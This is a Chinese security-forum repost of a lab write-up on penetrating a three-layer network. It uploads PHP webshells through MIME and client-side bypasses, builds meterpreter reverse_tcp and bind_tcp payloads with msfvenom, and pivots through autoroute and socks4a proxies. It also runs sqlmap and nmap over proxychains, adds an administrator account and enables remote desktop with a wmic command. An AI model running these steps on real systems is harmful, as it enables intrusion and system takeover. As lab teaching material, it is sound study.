安全矩阵

 找回密码
 立即注册
搜索
查看: 2872|回复: 0

三层网络渗透测试实验

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2021-10-18 00:55:32 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2021-10-18 01:06 编辑

三层网络渗透测试实验

前言在渗透测试过程中我们会遇到很多不同的网络情况,或许普通的内网渗透我们已经很熟练了,但在现实环境中或许会有多层网络结构,如果遇到多层网络结构我们应该如何进行渗透呢?利用这个实验我们就可以更清晰的了解多层网络渗透测试的过程。并了解通过msf进行内网渗透,由一级代理到二级代理的搭建来进行对三层网络的渗透的过程。
【三层网络拓扑图】

【第一层主机】

目标ip:192.168.31.207
访问目标ip发现是一个文件上传页面




经测试可通过文件类型MIME绕过进行上传php脚本,上传成功后返回路径




访问返回的文件路径,成功连接到php大马




查看ip发现该主机是双网卡,第二层网络段为192.168.1.0/24



为进一步进行内网渗透,我们上传msf后门
后门制作:
1. msfvenom -p linux/x64/meterpreter/reverse_tcp
LHOST=192.168.31.207
LPORT=6666
SessionCommunicationTimeout=0
SessionExpirationTimeout=0 -f elf >shell.elf
将后门上传到第一层主机192.168.31.207
设置msf监听





在第一层主机上运行shell.elf
  1. Chmod 777 shell.elf
  2. ./shell.elf
复制代码


msf获得meterpreter



将第一层的meterpreter切换到后台运行

  1. 1.background
复制代码




【第二层主机】
利用第一层的meterpreter添加第二层的路由
  1. 1.run autoroute -s 192.168.1.0/24
复制代码


扫描发现第二层主机ip为192.168.1.100

接着利用msf搭建socks代理,好让攻击机直接打第二层网络:

1.use auxiliary/server/socks4a


设置好代理后访问192.168.1.100成功访问到网站




利用弱口令admin/admin登录到后台

在设置处发现可修改允许上传文件的类型,修改后保存设置





在撰写新文章处添加附件可直接上传php脚本




成功连接到php大马


为了打开第三层,我们需要在第二层主机上传msf后门
制作后门:

  1. msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf
复制代码
利用大马上传,并在第二层主机上运行
  1. chmod 777 ding.elf
  2. ./ding.elf
复制代码
设置msf相关配置




成功获取到第二层主机meterpreter




查看ip发现第三层网段为192.168.2.0/24




利用第二层主机的meterpreter添加第三层的网络路由




启用一个socks4a代理给第三层网络,端口设置为2334




然后在配置文件中加上
  1. 1.socks4 192.168.31.119  2334
复制代码




利用获得的meterpreter发现第三层目标主机为192.16.2.100




【第三层主机】


使用代理打开Firefox访问第三层主机ip192.168.2.100




通过测试发现http://192.168.2.100/category.php?cat_id=1处存在sql注入



利用proxychains跑一下sqlmap

  1. 1.proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"
复制代码


成功注出后台账号和加密的密码

发现管理员密码解不开,

利用nmap扫描网站后台路径。

  1. 1.proxychains nmap --script http-enum -p80 192.168.2.100
复制代码



发现有个上传点

测试发现该上传点是前端检测,利用JavaScript绕过即可上传成功



访问/upload/uploads/webshelldama.php成功连接到php大马




利用大马查看发现是windows2003系统





添加用户账号密码



将添加的用户账号密码添加到管理组



利用大马开启3389端口
  1. 1.wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
复制代码


成功开启3389端口



利用添加的管理员账号密码成功登录到远程桌面





作者:weixin_44991517
原文链接:https://blog.csdn.net/weixin_44991517/article/details/92764972


声明:此次渗透为实验环境,仅供学习研究。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 22:20 , Processed in 0.020312 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表